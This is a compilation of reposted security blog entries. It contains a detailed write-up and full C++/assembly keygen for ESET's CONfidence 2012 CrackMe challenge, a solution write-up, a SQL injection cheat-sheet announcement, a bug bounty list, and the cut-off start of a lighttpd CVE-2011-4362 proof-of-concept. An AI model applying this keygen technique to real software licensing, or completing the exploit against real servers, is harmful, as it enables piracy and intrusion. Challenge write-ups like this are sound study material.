> 24 07 AND AL,7 00401535 . 0C F0 OR AL,0F0 00401537 . 32D0 XOR DL,AL [...] 00401557 > 56 PUSH ESI ; Unpacked.00403000 00401558 . E8 C8FBFFFF CALL Unpacked.00401125 0040155D . 0C 70 OR AL,70 [...] 00401573 > C1E0 08 SHL EAX,8 00401576 . 0C 0F OR AL,0F 00401578 . C1E2 10 SHL EDX,10 0040157B . 33C2 XOR EAX,EDX [...] 004015A0 . 8907 MOV DWORD PTR DS:[EDI],EAX 004015A2 . 83C7 04 ADD EDI,4 004015A5 . C3 RETN As we see, when the EAX = 3 some 4-byte instruction is created (like PSLLD MM6,2). Other two cases creates 3-byte instructions (like PSUBW MM6,MM3). Fourth instruction: 0040132D > 56 PUSH ESI 0040132E . E8 F2FDFFFF CALL Unpacked.00401125 [...] 00401351 > 8BEB MOV EBP,EBX 00401353 . 83E5 07 AND EBP,7 00401356 . 81CD F8000000 OR EBP,0F8 0040135C . FF1485 6D14400> CALL DWORD PTR DS:[EAX*4+40146D] - then if follows analogicaly like 3-rd. Fifth [...] 00401377 > 81E3 FFFFFF7F AND EBX,7FFFFFFF 0040137D . 56 PUSH ESI ; Unpacked.00403000 0040137E . E8 A2FDFFFF CALL Unpacked.00401125 00401383 . D1E8 SHR EAX,1 [...] 004013A8 . F7D8 NEG EAX 004013AA . 83E0 09 AND EAX,9 004013AD . BD F7000000 MOV EBP,0F7 004013B2 . 33E8 XOR EBP,EAX [...] 004015A6 $ 56 PUSH ESI ; Unpacked.00403000 004015A7 . E8 79FBFFFF CALL Unpacked.00401125 004015AC . 8AE0 MOV AH,AL 004015AE . 80E4 01 AND AH,1 004015B1 . C0E4 04 SHL AH,4 004015B4 . 80CC EF OR AH,0EF [...] 004015DA . 8AD0 MOV DL,AL 004015DC . 80E2 02 AND DL,2 004015DF . D0E2 SHL DL,1 004015E1 . 80CA FB OR DL,0FB [...] 00401602 > 22D4 AND DL,AH [...] 00401618 > 8AF0 MOV DH,AL 0040161A . 80E6 01 AND DH,1 0040161D . F6DE NEG DH [...] 00401642 . 56 PUSH ESI ; Unpacked.00403000 00401643 . E8 DDFAFFFF CALL Unpacked.00401125 00401648 . 22F0 AND DH,AL 0040164A . 32D6 XOR DL,DH [...] 0040166A > 8BC5 MOV EAX,EBP 0040166C . 0FB6D2 MOVZX EDX,DL 0040166F . 0FB6C0 MOVZX EAX,AL 00401672 . C1E0 10 SHL EAX,10 00401675 . C1E2 08 SHL EDX,8 [...] 00401691 > 33C2 XOR EAX,EDX 00401693 . 35 0F0000CC XOR EAX,CC00000F 00401698 . 8907 MOV DWORD PTR DS:[EDI],EAX 0040169A . 83C7 03 ADD EDI,3 [...] 004016BB > 8BC3 MOV EAX,EBX 004016BD . C1E8 1F SHR EAX,1F 004016C0 . 33D8 XOR EBX,EAX 004016C2 . C3 RETN Sixth: 004013EB > 8BC3 MOV EAX,EBX 004013ED . C1E8 05 SHR EAX,5 004013F0 . 83F0 08 XOR EAX,8 004013F3 . 83E0 38 AND EAX,38 004013F6 . C1ED 03 SHR EBP,3 [...] 0040141C 83E5 07 AND EBP,7 0040141F 0BE8 OR EBP,EAX 00401421 81CD C0000000 OR EBP,0C0 [...] 004015A6 $ 56 PUSH ESI ; Unpacked.00403000 004015A7 . E8 79FBFFFF CALL Unpacked.00401125 004015AC . 8AE0 MOV AH,AL 004015AE . 80E4 01 AND AH,1 004015B1 . C0E4 04 SHL AH,4 004015B4 . 80CC EF OR AH,0EF [...] 004015DA . 8AD0 MOV DL,AL 004015DC . 80E2 02 AND DL,2 004015DF . D0E2 SHL DL,1 004015E1 . 80CA FB OR DL,0FB [...] 00401602 > 22D4 AND DL,AH [...] 00401618 > 8AF0 MOV DH,AL 0040161A . 80E6 01 AND DH,1 0040161D . F6DE NEG DH [...] 00401642 . 56 PUSH ESI ; Unpacked.00403000 00401643 . E8 DDFAFFFF CALL Unpacked.00401125 00401648 . 22F0 AND DH,AL 0040164A . 32D6 XOR DL,DH [...] 0040166A > 8BC5 MOV EAX,EBP 0040166C . 0FB6D2 MOVZX EDX,DL 0040166F . 0FB6C0 MOVZX EAX,AL 00401672 . C1E0 10 SHL EAX,10 00401675 . C1E2 08 SHL EDX,8 [...] 00401691 > 33C2 XOR EAX,EDX 00401693 . 35 0F0000CC XOR EAX,CC00000F 00401698 . 8907 MOV DWORD PTR DS:[EDI],EAX 0040169A . 83C7 03 ADD EDI,3 [...] 004016BB > 8BC3 MOV EAX,EBX 004016BD . C1E8 1F SHR EAX,1F 004016C0 . 33D8 XOR EBX,EAX 004016C2 . C3 RETN After that… 00401454 . C0C3 04 ROL BL,4 00401457 . 81F3 00010000 XOR EBX,100 ; ECX = 100h 0040145D . 49 DEC ECX ; ECX = 0FFh 0040145E .^0F85 88FDFFFF JNZ Unpacked.004011EC and navigation goes back to generation of first instruction. As we see, ECX is decremented - exactly 256 blocks of 6 instructions are generated. The full MMX Generating code for any given login You can find in attached example: Generator.cpp [h=4]Keygenning[/h] The MMX Generator was a missing piece of puzzle. Other pieces are described in my previous post. Now we must put them together and the keygen is ready! But as we know, the generated MMX instructions must be reversed. There are two things to be done about it: Reversing the last (6-th instruction) in every block Reversing the order of blocks (first block must be the last and so on) Ok, let’s do it one by one. [h=5]Reversing the last (6-th instruction) in every block:[/h] The set of possible instructions occuring in the 6-th line is: {PADDB, PADDW, PADDQ, PSUBB,PSUBW, PSUBQ, XOR}. Three type of addition (add BYTE, add DWORD, add QWORD), analogical substractions and XOR. Reversing table will look like this: PADDB -> PSUBB PADDW -> PSUBW PADDD -> PSUBD PSUBB -> PADDB PSUBW -> PADDW PSUBD -> PADDD XOR -> XOR But we can operate on opcodes only. The representation of following instruction is: PADDB = 0xfc PADDW = 0xfd PADDQ = 0xfe PSUBB = 0xf8 PSUBW = 0xf9 PSUBQ = 0xfa XOR = 0xef So, when the 6-th instruction is generated, we must substitute one opcode by another – representing reversed operation. Take a look at the code generating 6-th instruction in Generator.cpp: thus, instruction in EDX should be reversed before the XORing wih EAX (line 332). It can be done easyli: if (EDX == 0xef) -> don’t do anything (it’s XOR) else if (EDX < 0xfc) -> EDX += 4 else -> EDX -= 4 I hope everything is clear [h=5]Reversing the order of blocks[/h] We must fill the buffer of blocks from the back to front. Here the only problem is, we don’t know the exact length in bytes of a single block, because instructions{3, 4} can be either of 3 or of 4 bytes. That’s why we have to reserve memory for the maximal case and fill the gaps with NOPs (0×90). Then, adding RET at the end of the buffer, and we can call the generated code as a function, from within assembler code. Mind that the keygen must be compiled with DEP (Data Execution Prevention) switched off (eventualy you can set this page of memory executable by VirtualProtect). It’s time to look at the Keygen.cpp! //--------------------------------------------------------------------------- // the code published under Creative Commons (CC-BY-NC) license // author: hasherezade (http://hshrzd.wordpress.com) // the keygenerator for ESET CrackMe, CONfidence2012 (http://2012.confidence.org.pl) // remarks: compile with DEP disabled //--------------------------------------------------------------------------- #include <windows.h> #include <iostream> using namespace std; BYTE hsh[16]; BYTE hashes[4][16]; BYTE output[16]; /* maxBlock = 6 instructions total: instruction[1,2,5,6] -> 3 bytes instruction[3,4] -> 3 or 4 bytes -> max 4 bytes + 1 byte -> NOP at the end of 6-th instruction (padding) */ const DWORD maxBlock = 4 * 3 + 2 * 4 + 1; const DWORD bufMax = maxBlock * 256; BYTE buffer[bufMax]; DWORD bufIndex = bufMax - maxBlock; DWORD blockStart = bufMax; //---------------------------------------- typedef struct { ULONG i[2]; ULONG buf[4]; unsigned char in[64]; unsigned char digest[16]; } MD5_CTX; typedef void (WINAPI *t_MD5Init)( MD5_CTX *context ); t_MD5Init MD5Init; typedef void (WINAPI *t_MD5Update)( MD5_CTX *context, const unsigned char *input, unsigned int inlen ); t_MD5Update MD5Update; typedef void (WINAPI *t_MD5Final) ( MD5_CTX *context ); t_MD5Final MD5Final; char revrs(int a) { a += 0x41; if (a >= 'A' && a <= 'Z') return a; a += 6; return a; } void decode_chunks() { int V = 0x29, i = 0; WORD* out = (WORD*)output; while (i < 8) { WORD chunk = out[i]; i++; //printf("\n%4X",chunk); int x,y,z; int a; z = chunk % V; a = chunk / V; y = a % V; x = a / V; printf("%c%c%c", revrs(x), revrs(y), revrs(z)); } } //---------------------------------------- void call_generated() { memset(output,0,16); void* generated = (void*)buffer; _asm { EMMS MOVQ MM0,QWORD PTR hashes[0] MOVQ MM1,QWORD PTR hashes[8] MOVQ MM2,QWORD PTR hashes[0x10] MOVQ MM3,QWORD PTR hashes[0x18] MOVQ MM4,QWORD PTR hashes[0x20] MOVQ MM5,QWORD PTR hashes[0x28] call generated MOVQ QWORD PTR output[0], MM0 MOVQ QWORD PTR output[8], MM1 }; } void genetrateReversed() { memset(buffer, 0x90, bufMax); __asm { push ebp mov EBX, 0x42 mov ECX, 0x100 jmp start process_hsh: PUSH ESI PUSH EDX MOV EDX, dword ptr hsh[0] AND EDX,0x87 SETPO DL XOR EAX,EAX SHL dword ptr hsh[0],1 RCL DWORD PTR hsh[4],1 RCL DWORD PTR hsh[8],1 RCL DWORD PTR hsh[0xC],1 ADC EAX,EAX XOR EAX,EDX OR DWORD PTR hsh[0],EAX POP EDX POP ESI RET get_cmd_base: PUSH EDX PUSH ESI bgn1: call process_hsh MOV EDX,EAX call process_hsh LEA EAX,DWORD PTR DS:[EAX+EDX*2] TEST EAX,EAX JE bgn1 POP ESI POP EDX RET Instruction1: call get_cmd_base SHR EAX,1 NEG EAX AND EAX,1 MOV EBP,EBX AND EBP,0x700 SHR EBP,5 OR EBP,0xC6 XOR EBP,EAX MOV EAX,EBP SHL EAX,0x18 OR EAX,0x7F0FCC ROR EAX,8 MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,3 MOV EAX,EBX SHR EAX,0x1F XOR EBX,EAX RET Instruction2: OR EBX,0x80000000 MOV EAX,EBX AND EAX,7 SHL EAX,3 AND EBP,0xC7 OR EBP,EAX XOR EBP,1 MOV EAX,EBP SHL EAX,0x18 OR EAX,0x7F0FCC ROR EAX,8 MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,3 MOV EAX,EBX SHR EAX,0x1F XOR EBX,EAX RET case1: call get_cmd_base MOV AH,AL AND AH,1 SHL AH,4 OR AH,0xEF MOV DL,AL AND DL,2 SHL DL,1 OR DL,0xFB AND DL,AH MOV DH,AL AND DH,1 NEG DH call get_cmd_base AND DH,AL XOR DL,DH MOV EAX,EBP MOVZX EDX,DL MOVZX EAX,AL SHL EAX,0x10 SHL EDX,8 XOR EAX,EDX XOR EAX,0xCC00000F MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,3 MOV EAX,EBX SHR EAX,0x1F XOR EBX,EAX RET case2: PUSH ECX call get_cmd_base MOV CL,AL AND CL,1 MOV AH,1 SHL AH,CL NOT AH ROL AH,4 AND AL,2 NOT AL ROL AL,1 AND AH,AL MOV ECX,EBP AND EAX,0xFF00 MOVZX ECX,CL SHL ECX,0x10 OR EAX,ECX XOR EAX,0xCC00000F MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,3 MOV EAX,EBX SHR EAX,0x1F XOR EBX,EAX POP ECX RET case3: call get_cmd_base SHR AL,1 MOV DL,AL SHL DL,5 call get_cmd_base MOV DH,AL MOV EAX,EBP SHR AL,3 AND AL,7 OR AL,0xF0 XOR DL,AL call get_cmd_base OR AL,0x70 SHL EAX,8 OR AL,0x0F SHL EDX,0x10 XOR EAX,EDX MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,4 RET Instruction3: call get_cmd_base MOV EBP,EBX AND EBP,7 OR EBP,0x0F0 the_switch: cmp eax, 1 jne c2 jmp case1 c2: cmp eax, 2 jne c3 jmp case2 c3: cmp eax, 3 jne c4 jmp case3 c4: RET Instruction4: call get_cmd_base MOV EBP,EBX AND EBP,7 OR EBP,0x0F8 jmp the_switch RET Instruction5: AND EBX,0x7FFFFFFF call get_cmd_base SHR EAX,1 NEG EAX AND EAX,9 MOV EBP,0xF7 XOR EBP,EAX call get_cmd_base MOV AH,AL AND AH,1 SHL AH,4 OR AH,0xEF MOV DL,AL AND DL,2 SHL DL,1 OR DL,0xFB AND DL,AH MOV DH,AL AND DH,1 NEG DH call get_cmd_base AND DH,AL XOR DL,DH MOV EAX,EBP MOVZX EDX,DL MOVZX EAX,AL SHL EAX,0x10 SHL EDX,8 XOR EAX,EDX XOR EAX,0xCC00000F MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,3 MOV EAX,EBX SHR EAX,0x1F XOR EBX,EAX RET Instruction6: MOV EAX,EBX SHR EAX,5 XOR EAX,8 AND EAX,0x38 SHR EBP,3 AND EBP,7 OR EBP,EAX OR EBP,0xC0 call get_cmd_base MOV AH,AL AND AH,1 SHL AH,4 OR AH,0xEF MOV DL,AL AND DL,2 SHL DL,1 OR DL,0xFB AND DL,AH MOV DH,AL AND DH,1 NEG DH call get_cmd_base AND DH,AL XOR DL,DH MOV EAX,EBP MOVZX EDX,DL MOVZX EAX,AL SHL EAX,0x10 call reverseInstruction6 SHL EDX,8 XOR EAX,EDX XOR EAX,0x9000000F ;// i want NOP at the end of the last instruction (instead of INT 3: XOR EAX,0xCC00000F) MOV EDI, bufIndex MOV DWORD PTR buffer[EDI], EAX ADD bufIndex,3 MOV EAX,EBX SHR EAX,0x1F XOR EBX,EAX RET reverseInstruction6: ;/* ; 0xfc -> 0xf8 (PADDB -> PSUBB) ; 0xfd -> 0xf9 (PADDW -> PSUBW) ; 0xfe -> 0xfa (PADDD -> PSUBD) ; ; 0xf8 -> 0xfc (PSUBB -> PADDB) ; 0xf9 -> 0xfd (PSUBW -> PADDW) ; 0xfa -> 0xfe (PSUBD -> PADDD) ; ; 0xef -> 0xef (reversed XOR is XOR) ;*/ cmp EDX, 0xef je revEnd cmp EDX, 0xfc jb r1 SUB EDX,4 jmp revEnd r1: ADD EDX,4 revEnd: RET start: push ebx mov ebx,blockStart sub ebx, maxBlock mov blockStart, ebx mov bufIndex, ebx pop ebx call Instruction1 call Instruction2 call Instruction3 call Instruction4 call Instruction5 call Instruction6 ROL BL,4 XOR EBX,0x100 DEC ECX JNZ start pop ebp }; BYTE ret = 0xc3; buffer[bufMax-1] = ret; } int main(){ //load int i; HMODULE hCryptdll = LoadLibraryA("Cryptdll.dll"); if (hCryptdll==NULL) return (-1); MD5Init = (t_MD5Init)GetProcAddress(hCryptdll, "MD5Init"); MD5Update = (t_MD5Update)GetProcAddress(hCryptdll, "MD5Update"); MD5Final = (t_MD5Final)GetProcAddress(hCryptdll, "MD5Final"); //Get input const int MAX = 33; char input[MAX]; printf("Name:\n"); scanf("%[ A-Za-z]s", input); //including space int len = strlen(input); MD5_CTX md5; MD5Init(&md5); MD5Update(&md5,(const unsigned char *)input, len); MD5Final(&md5); memcpy(hsh, md5.digest, 16); //other hashes memcpy(hashes[0], md5.digest, 16); char backup[16]; memcpy(backup, md5.digest, 16); int x; for (x = 1; x < 3; x++) { MD5Init(&md5); MD5Update(&md5,(const unsigned char *)backup, 16); MD5Final(&md5); memcpy(hashes[x], md5.digest, 16); memcpy(backup, md5.digest, 16); } //--- genetrateReversed(); call_generated(); printf("\nRegistration key:\n"); decode_chunks(); printf("\n\n---\n"); system("pause"); return 0; } Sursa: Keygenning ESET’s CONfidence 2012 Crackme | hasherezade's 1001 nights

Solving ESET’s CONfidence 2012 Crackme Solving ESET’s CONfidence 2012 Crackme 12 comments Intro Have You heard / read about CONfidence? It’s two days IT security conference, organized annualy in Cracow, Poland. (Here you can read more…). It used to be a tradition, that ESET company prepares a CrackMe, for atendees of the conference. This year the rules were different: they published the CrackMe before, and decided to reward first 5 solvers by CONfidence tickets ^^. And it happend – I was the one of them … So, now I have a pleasure to describe for You what the CrackMe was about and how did i aproached it. CrackMe Here You can find original CrackMe: CONfidence CrackMe2012 (password to rar: ESET) If you are not interested to unpack it, but just to play with algo, here i prepared unpacked version: Unpacked CrackMe The CrackMe was writen in assembler and packed with MPRESS. It uses 2 custom hashing procedures – one of them was generated on the base of username. Unpacking it was very easy – i did it just by stepping in OllyDbg, and then dumping the memory. No external tools for imports rebuilding were required. Tools used PEid (optional) ImmunityDbg / OllyDbg - with OllyDump plugin (for unpacking) Tiny self-made tools writen in C++ (i will describe them further) What CrackMe does - gets the username (length of username: from 4 to 31) - gets the password (must be exactly 24 characters long, containing characters [A-Za-o]) - generates 3 MD5 hashes in following manner: #1 -> md5(username) #2 -> md5(#1) #3 -> md5(#2) input: hasherezade hash#1 = D88EB947A504FCF6C3D9DCA5F84DE42A hash#2 = 12EB2430F671103B94D11F34D375CC0D hash#3 = B23D343E81CEE206B9D180B7B0189010 Sample Md5 generator Hashes are used to generate an MMX code, used in password verification. The most (the only?) challenging part was to crack this MMX hash. It’s easy to spot this function, because it is called just before the decision, whether the password is correct or not. It’s result is compared with hash#1, and when it is equal, then our password is accepted. The address of the function is hidden in EAX… The function is placed at memory address 0×403090 (till 0×404355). 1536 MMX instructions… Looks long and messy? Think so… It’s just a begining… First impresion was to brutforce it… But never mind, first impressions are often just delusions Obviously, brutforcing this would take ages! So there must be some other way… If You look closer, You see, that it’s not such a mess as it seems to be. I always like to start by sorting out what’s searched and what’s given Searched and given: Input is placed in registers MM0 to MM5. Output – placed in: MM0 to MM1 Registers at the begining of function execution: MM0,MM1 -> ? (our password in processed form) MM2,MM3 -> hash#2 MM4,MM5 -> hash#3 (mind endians!) MM0 and MM1 are filled with some “mysterious” hash – by simple experiments you can see that it is related with given password, but now we will not go into details of it… In the registers [MM2, MM3] hash#2 is placed and in [MM4, MM5] hash#3. Note, that these registers are not changing till the end of the procedure. (When i noticed it, i got sure that it is reversable ) Registers at the end of the function execution (changes are in highlighted) MM0,MM1 -> ?? (should be hash#1) MM2,MM3 -> hash#2 MM4,MM5 -> hash#3 The registers MM7, MM8 are used as helpers in calculation… The correct output should be the hash#1 placed in MM0, MM1… In short words, we must input into MM0, MM1 something, which after all this operations will let us have hash#1 in MM0, MM1… No other option – this long function must be reversed. Let’s take a closer look. There are 256 blocks of 6 instructions, which follows similar logic. See the samples below: For every N-th block: 1. Result from N-1 block (stored in MM0 or MM1) is moved to “helper register” – MM7 or MM6 2. Part of hash#2 or hash#3 os moved to “helper register” – MM6 or MM7 3. Some 3 operations are performed on this “hash part” 4. Result of these operations is addes/substracted/xored with result of N-2 block, stored in MM0 or MM1 It gives us plenty of information! For every operation, we can easly calculate the value, with which MM0/MM1 is modified. And we KNOW the last value of MM0, MM1! It’s hash#1. If take a closer look, you notice, that the only things we must do is: - reverse the last instruction in every block (change from PADDB to PSUBB and so on…) - set the blocks in opposit order (the last block must be the first one) - then – if you give hash#1 as an input (in MM0, MM1) – you will get as an output the searched value (the encoded password ) How to do it? There are many ways, and i am gona demontrate some more interesting examples later on. But, actually, the task specified by ESET was just to find the proper key for one’s name and surname (not to write a keygen). So i did it in very fast and dirty way – on the original exe. I coppied the piece of memory containing all these instruction, then reversed it by my small parsing tool (written in C++), and copied again at the place. Left -bottom fragment of original; Right – top fragment of reversed When i inserted hash#1 as the initial value of MM0 and MM1, it gave me at the end the searched – means – encoded password! MM0 = AFEC FFD1 F7D1 9AE0 MM1 = 8597 249E 0642 1F2D Now it’s not a big deal to decode it. Password encoding/decoding Password encoding goes along with password verification. It is very simple. Every character of the password is processed in a following way (let’s denote the processing function by f1: ) f1: if pass in [a-o] : value = pass – 0×41 – 0×6 if pass in [A-Z] : value = pass – 0×41 otherwise – incorrect password But not only they are processed, they are also added into a polynominal… Password is divided into chunks of 3 characters : 3 chars of password -> ( f1(pass[n]) * 0×29 +f1( pass[n+1] ) ) * 0×29 + f1(pass[n+2]) –> 4 bytes of the “encoded password” To ilustrate, how it can be reversed, I placed here a source of my Simple Chunk Decoder. MM0 = AFEC FFD1 F7D1 9AE0 MM1 = 8597 249E 0642 1F2D 9AE0 F7D1 FFD1 AFEC 1F2D 0642 249E 8597 Password decoded by the Simple Chunk Decoder Now just copy the password into the field… And it’s done! Post Scriptum Due to the fact, that some people are interested, I am prepairing a new post on keygenning this crackme – including analysis of the MMX instructions generating code. If You want to see alternative solution, take a look on Vnd’s homepage Sursa: Solving ESET’s CONfidence 2012 Crackme | hasherezade's 1001 nights

[h=3]MS Access SQL Injection Cheat Sheet Reloaded[/h] SQL Injections are still very popular, for both ethical and unethical attackers. Although numerous research covering this topic have been published, SQL Injection vulnerabilities in Microsoft Access powered websites didn't receive much attention. Back in 2007, @_daath published the first MS Access SQL Injection Cheat Sheet. A few years later, NibbleSec decided to update the document in a brand new format. New stuff has been added as well as external resources have been merged. Enjoy the reloaded MS Access SQL Injection Cheat Sheet Sursa: Nibble Security: MS Access SQL Injection Cheat Sheet Reloaded

[h=3]"No More Free Bugs" Initiatives[/h]Two years after the launch of the "No More Free Bugs" philosophy, several companies and Open Source projects are now offering programs designed to encourage security research in their products. In addition, many private firms are publicly offering vulnerability acquisition programs. This post is an attempt to catalog all public and active incentives. This includes traditional "Bug Bounty Programs" as well as "Vulnerability/Exploit Acquisition Programs". Bug Bounty Programs [TABLE=width: 100%] [TR] [TD=bgcolor: #cccccc, align: center] Sponsor [/TD] [TD=bgcolor: #cccccc, align: center] Target [/TD] [TD=bgcolor: #cccccc, align: center] Reward [/TD] [/TR] [TR] [TD=align: center]Access[/TD] [TD=align: center]Undisclosed vulnerability in a software used by human rights defenders and activists.[/TD] [TD=align: center]$20,000 (winner award)[/TD] [/TR] [TR] [TD=align: center]AT&T[/TD] [TD=align: center]Security vulnerabilities found within the AT&T API Platform[/TD] [TD=align: center]$100-$5,000, plus merchandize (e.g. LTE data cards, phones with free service)[/TD] [/TR] [TR] [TD=align: center]Avast[/TD] [TD=align: center]Security vulnerabilities in the latest consumer Windows versions of Avast[/TD] [TD=align: center]$200-$5,000[/TD] [/TR] [TR] [TD=align: center]Barracuda[/TD] [TD=align: center]Vulnerabilities in Barracuda appliances, including Spam/Virus Firewall, Web Filter, WAF, NG Firewall[/TD] [TD=align: center]$500-$3,133.7[/TD] [/TR] [TR] [TD=align: center]BugCrowd[/TD] [TD=align: center]Crowdsourced security testing. BugCrowd manages bug bounty programs for third-party companies[/TD] [TD=align: center]Starting from $250[/TD] [/TR] [TR] [TD=align: center]BugWolf[/TD] [TD=align: center]Marketplace for bug bounty hunters. BugWolf manages bug bounty programs for third-party companies[/TD] [TD=align: center]Starting from $500[/TD] [/TR] [TR] [TD=align: center]Djbdns[/TD] [TD=align: center]Verifiable security holes in the latest version of Djbdns[/TD] [TD=align: center]$1000[/TD] [/TR] [TR] [TD=align: center]Etsy[/TD] [TD=align: center]Web application vulnerabilities affecting the main Etsy - Your place to buy and sell all things handmade, vintage, and supplies site, the etsy.com API, or the official Etsy mobile application[/TD] [TD=align: center]Starting from $500[/TD] [/TR] [TR] [TD=align: center]Facebook[/TD] [TD=align: center]Facebook web platform security bugs. No third-party applications[/TD] [TD=align: center]Starting from $500[/TD] [/TR] [TR] [TD=align: center]Gallery[/TD] [TD=align: center]Security issues in the latest stable release of the popular web based photo album organizer[/TD] [TD=align: center]$100-$1000[/TD] [/TR] [TR] [TD=align: center]Google[/TD] [TD=align: center]Chromium browser project, Chrome OS and selected Google web properties bugs[/TD] [TD=align: center]$500-$20,000[/TD] [/TR] [TR] [TD=align: center]Hex-Rays[/TD] [TD=align: center]Security bugs in the latest public release of Hex-Rays IDA[/TD] [TD=align: center]Up to $3000[/TD] [/TR] [TR] [TD=align: center]Kaneva[/TD] [TD=align: center]High impact web application vulnerabilities[/TD] [TD=align: center]$100[/TD] [/TR] [TR] [TD=align: center]Mega[/TD] [TD=align: center]Web application vulnerabilities and crypto bugs affecting MEGA's online systems[/TD] [TD=align: center]Up to €10000[/TD] [/TR] [TR] [TD=align: center]Mozilla[/TD] [TD=align: center]Firefox, Thunderbird and selected Mozilla Internet-facing websites bugs[/TD] [TD=align: center]$500-$3000, plus Mozilla T-shirt[/TD] [/TR] [TR] [TD=align: center]Nokia[/TD] [TD=align: center]Vulnerabilities in all Nokia run services, applications and products excluding corporate infrastructure[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]PayPal[/TD] [TD=align: center]Web application vulnerabilities in www.paypal.com[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]Piwik[/TD] [TD=align: center]Flaws in Piwik web analytics software[/TD] [TD=align: center]$200-$500[/TD] [/TR] [TR] [TD=align: center]Qmail[/TD] [TD=align: center]Verifiable security holes in the latest version of Qmail[/TD] [TD=align: center]$5000[/TD] [/TR] [TR] [TD=align: center]Samsung[/TD] [TD=align: center]Security bugs in Samsung TV/BD[/TD] [TD=align: center]Starting from $500[/TD] [/TR] [TR] [TD=align: center]Tarsnap[/TD] [TD=align: center]Tarsnap bugs, affecting either pre-release or released versions[/TD] [TD=align: center]$1-$2000[/TD] [/TR] [TR] [TD=align: center]Yandex[/TD] [TD=align: center]Security vulnerabilities in Yandex's services or mobile applications, as specified on the terms and conditions page[/TD] [TD=align: center]$100-$1000[/TD] [/TR] [/TABLE] Vulnerability/Exploit Acquisition Programs [TABLE=width: 100%] [TR] [TD=bgcolor: #cccccc] Sponsor [/TD] [TD=bgcolor: #cccccc] Target [/TD] [TD=bgcolor: #cccccc] Reward [/TD] [/TR] [TR] [TD=align: center]BeyondSecurity SecuriTeam[/TD] [TD=align: center]High and medium impact bugs in widely spread software[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]Coseinc[/TD] [TD=align: center]Unpublished security vulnerabilities for Windows, Linux and Solaris[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]Digital Armaments[/TD] [TD=align: center]Vulnerability and/or exploit code for high value software[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]Exodus Intelligence Program[/TD] [TD=align: center]Vulnerability research acquisition program for unknown vulnerabilities affecting widely deployed software packages[/TD] [TD=align: center]$n/a plus yearly bonuses[/TD] [/TR] [TR] [TD=align: center]ExploitHub[/TD] [TD=align: center]Legitimate market-place for non-zero-day exploits[/TD] [TD=align: center]$50-$1000. Both one-time purchase payments as well as recurring monthly payments from site-license customers[/TD] [/TR] [TR] [TD=align: center]iSight Partners[/TD] [TD=align: center]Bugs in typical corporate environment applications[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]Netragard[/TD] [TD=align: center]0-day exploits against well-known software[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]Packet Storm[/TD] [TD=align: center]Exploits for 0-day and 1-day vulnerabilities in enterprise-grade software (Microsoft, Flash, Java, etc.)[/TD] [TD=align: center]$1000-$7000[/TD] [/TR] [TR] [TD=align: center]Secunia[/TD] [TD=align: center]Unknown vulnerabilities affecting stable and latest release of products. All classes of vulnerabilities are eligible.[/TD] [TD=align: center]From top-of-the range merchandise to an IT security conference pass and hotel accommodation[/TD] [/TR] [TR] [TD=align: center]TippingPoint ZDI[/TD] [TD=align: center]Undisclosed vulnerability research, affecting widely deployed software[/TD] [TD=align: center]$n/a plus awards and benefits, depending on the contributor's status[/TD] [/TR] [TR] [TD=align: center]VeriSign iDefence[/TD] [TD=align: center]Security vulnerabilities in widely deployed applications[/TD] [TD=align: center]$n/a[/TD] [/TR] [TR] [TD=align: center]White Fir Design[/TD] [TD=align: center]Bugs in WordPress code and plugins (with over 1 million downloads and compatible with the most recent WordPress)[/TD] [TD=align: center]$50-$500[/TD] [/TR] [/TABLE] Contributions are welcome! If you are aware of an initiative not listed here or you want to report an inaccuracy in your initiative, please leave a comment and we will update this page over time. In fact, the more people, the better. Just to clarify, we aim at indexing programs that are: Legal. Although black/gray market places exist, we don't certainly want to list them here Active. We want to keep track of ongoing initiatives. Even time-limited programs are eligible, as long as they are still accepting submissions Public. All entries must have publicly available details. This may range from accurate guidelines and rules to just a simple sentence stating the nature of the incentive. It hence follows that we are going to report public information only. In case of cash rewards, the actual amount is reported whenever the min-max price paid is clearly stated Reward-based. In most cases, entries are "cash-for-bugs" programs. However, any kind of tangible reward is eligible. "No More Free Bugs" versus "No More Cheap Bugs" disputes are not considered here Disclaimer: we do not endorse, represent or warrant the accuracy or reliability of any of these programs. Posted by Luca Carettoni Sursa: Nibble Security: "No More Free Bugs" Initiatives

Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang 29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that mod_auth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: "src/http_auth.c:67" --- CUT --- static const short base64_reverse_table[256] = ...; static unsigned char * base64_decode(buffer *out, const char *in) { ... int ch, ...; size_t i; ... ch = in[i]; ... ch = base64_reverse_table[ch]; ... } --- CUT --- Exploit: /* * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang * * Here the vulnerable code (src/http_auth.c:67) * * --- CUT --- * static const short base64_reverse_table[256] = { * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F * -1, 26, 27, 28, 29, 30, 